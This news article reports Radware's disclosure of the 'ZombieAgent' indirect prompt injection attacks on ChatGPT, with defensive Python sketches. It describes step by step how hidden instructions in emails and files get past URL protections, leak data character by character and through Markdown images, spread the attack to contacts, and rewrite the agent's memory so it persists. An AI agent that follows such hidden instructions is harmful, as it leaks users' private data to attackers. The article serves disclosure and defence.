ChatGPT vulnerabilities could be exploited to exfiltrate user data and modify the agent’s long-term memory for persistence, web security firm Radware reports.
Widely adopted across enterprises worldwide, ChatGPT has broad access to internal applications, such as Gmail, GitHub, Jira, and Teams, and by default stores user conversations and sensitive information.
It also includes built-in functionality to browse the web, analyze files, and more, making it convenient and powerful, but also expanding the risks associated with its malicious use.
On Thursday, Radware disclosed a new indirect prompt injection technique that exploits ChatGPT vulnerabilities to exfiltrate user data and turn the AI agent into a persistent spy tool for attackers.
Called ZombieAgent, the attack relies on malicious emails and files to bypass OpenAI’s protections and exfiltrate data from the victim’s inbox and email address book, without user interaction.
In the first scenario detailed by Radware, the attacker exfiltrates sensitive user data via OpenAI’s own servers by sending an email containing malicious instructions for ChatGPT.
When the user asks the AI agent to perform a Gmail action, it reads the instructions in the attacker’s email and exfiltrates the data “before the user ever sees the content”, Radware says.
The email contains a list of pre-constructed URLs, one for each letter and digit plus a special token for spaces, and instructs ChatGPT to search for sensitive information, normalize it, and exfiltrate it character by character using the provided URLs.
ChatGPT is prevented from modifying provided URLs, a safeguard against leaking data by appending it as parameters to an attacker-provided link, but Radware’s attack renders this protection ineffective because the agent never needs to modify the pre-provided URLs.
For the attack to successfully exfiltrate sensitive information, “no user action is required beyond normal conversation with ChatGPT,” the security firm explains.
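From a defender’s point of view, the per-character URL list described above is an unusual pattern that can be looked for in inbound content. The following is a minimal Python sketch of one possible heuristic, not a method described by Radware or OpenAI: it flags text containing many URLs that share a host and path prefix and differ only in a final one-character path segment. The function name, the threshold, and the assumed URL layout are all hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Loose URL matcher; good enough for a sketch, not a full URL grammar.
URL_RE = re.compile(r"https?://[^\s<>\"')]+")


def find_char_url_tables(text, min_entries=20):
    """Return groups of URLs that look like a per-character lookup table.

    Assumed layout (hypothetical): https://host/prefix/<single character>.
    A group is reported when at least `min_entries` distinct characters
    appear under the same host and path prefix.
    """
    groups = defaultdict(set)
    for raw in URL_RE.findall(text):
        url = raw.rstrip(".,;")  # drop trailing sentence punctuation
        parts = urlsplit(url)
        prefix, _, last = parts.path.rpartition("/")
        if len(last) == 1 and last.isalnum():
            groups[(parts.netloc, prefix)].add(last)
    return {
        key: sorted(chars)
        for key, chars in groups.items()
        if len(chars) >= min_entries
    }
```

A real table could encode characters in the query string, a subdomain, or arbitrary path names, so a check like this would only catch the simplest layout and is best treated as one signal among several.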
Radware’s second attack scenario relies on malicious instructions contained in a file that the user shares with ChatGPT. Based on these instructions, the agent exfiltrates data, both via OpenAI’s servers and via Markdown image rendering.
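Markdown image rendering can leak data because the client fetches the image URL automatically, and that URL can carry the data. A common general mitigation, sketched below in Python, is to drop images whose host is not on an allowlist before rendering. This is an illustrative assumption, not OpenAI’s fix; the allowlist contents and function name are hypothetical, and the pattern only handles inline `![alt](url)` images, not reference-style images or raw HTML.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would choose its own trusted hosts.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline Markdown image: ![alt](url "optional title")
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_untrusted_images(markdown):
    """Replace images from non-allowlisted hosts with a text placeholder."""

    def replace(match):
        alt, url = match.group(1), match.group(2)
        host = urlsplit(url).hostname or ""  # relative URLs have no host
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        return f"[image removed: {alt}]"

    return IMAGE_RE.sub(replace, markdown)
```

For example, `strip_untrusted_images("x ![p](https://attacker.example/c?d=secret) y")` returns `"x [image removed: p] y"`, so the request that would have carried the query string is never made.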
Propagation and persistence
The third attack scenario presented by the security firm is like the first but targets the most recent email addresses in the victim’s inbox. After receiving the addresses, the attacker sends the malicious payload to them, propagating the attack.
In the fourth attack scenario, the attacker establishes persistence by sending a malicious file containing instructions to modify the agent’s long-term memory with attacker-created rules.
When the user shares the file with ChatGPT, the agent reads the instructions and sets the memory-modification rules.
Based on these rules, ChatGPT reads an attacker email and executes the instructions it contains every time the user sends a message, and saves sensitive information to memory every time the user shares it.
Normally, when using the Connectors feature (which gives it access to enterprise applications), ChatGPT cannot use the Memory feature (where it saves users’ sensitive information) in the same chat.
However, the attacker’s memory-modification rules result in the agent always reading Memory first, executing the attacker’s malicious instructions, and only then responding to the user.
According to Radware, this persistence mechanism can be abused for data manipulation or for performing more harmful actions.
Additionally, the security firm says, the attacks could target not only email, but any other enterprise application connected to ChatGPT, either for data harvesting or for delivering malicious instructions to the agent.
“In practice, any resource that ChatGPT can read via Connectors (emails, documents, tickets, repositories, shared folders, etc.) can potentially be abused to host attacker-controlled instructions that will later be executed by ChatGPT,” Radware notes.
An attacker could hide the malicious instructions in the content of any email or file, either by making the text white or by including them in a document’s disclaimers or footers, which are typically ignored by users.
“From the user’s perspective, the email or document appears benign and readable. From ChatGPT’s perspective, however, the full hidden prompt is visible in plain text and will be processed just like any other instruction,” the security firm says.
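The white-text trick suggests one check a mail or document pipeline could run before content reaches an AI agent. The Python sketch below, using only the standard library, collects text inside HTML elements whose inline style sets a white color, a zero font size, or `display: none`. It is an assumption-laden illustration rather than a described mitigation: it assumes a white background, well-formed markup, and inline styles only, and the class and function names are hypothetical.

```python
import re
from html.parser import HTMLParser

# Inline styles that commonly hide text from a human reader.
# The lookbehind keeps "background-color" from matching as "color".
HIDDEN_STYLE_RE = re.compile(
    r"(?<![-\w])color\s*:\s*(?:#fff(?:fff)?\b|white\b)"
    r"|font-size\s*:\s*0(?:px|pt|em|rem)?\s*(?:;|$)"
    r"|display\s*:\s*none",
    re.IGNORECASE,
)

# Elements without a closing tag; they must not be pushed on the stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img",
             "input", "link", "meta", "source", "track", "wbr"}


class HiddenTextFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self._stack = []       # per open element: is it or an ancestor hidden?
        self.hidden_text = []  # text fragments found inside hidden elements

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        inherited = bool(self._stack) and self._stack[-1]
        self._stack.append(inherited or bool(HIDDEN_STYLE_RE.search(style)))

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self._stack:
            self._stack.pop()

    def handle_data(self, data):
        if self._stack and self._stack[-1] and data.strip():
            self.hidden_text.append(data.strip())


def find_hidden_text(html):
    """Return text fragments that sit inside visually hidden elements."""
    finder = HiddenTextFinder()
    finder.feed(html)
    finder.close()
    return finder.hidden_text
```

Instructions placed in ordinary disclaimers or footers are fully visible and would not be caught this way, so a check like this addresses only the styling-based variant.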
Radware reported the issues to OpenAI via BugCrowd in September. A fix was released on December 16.
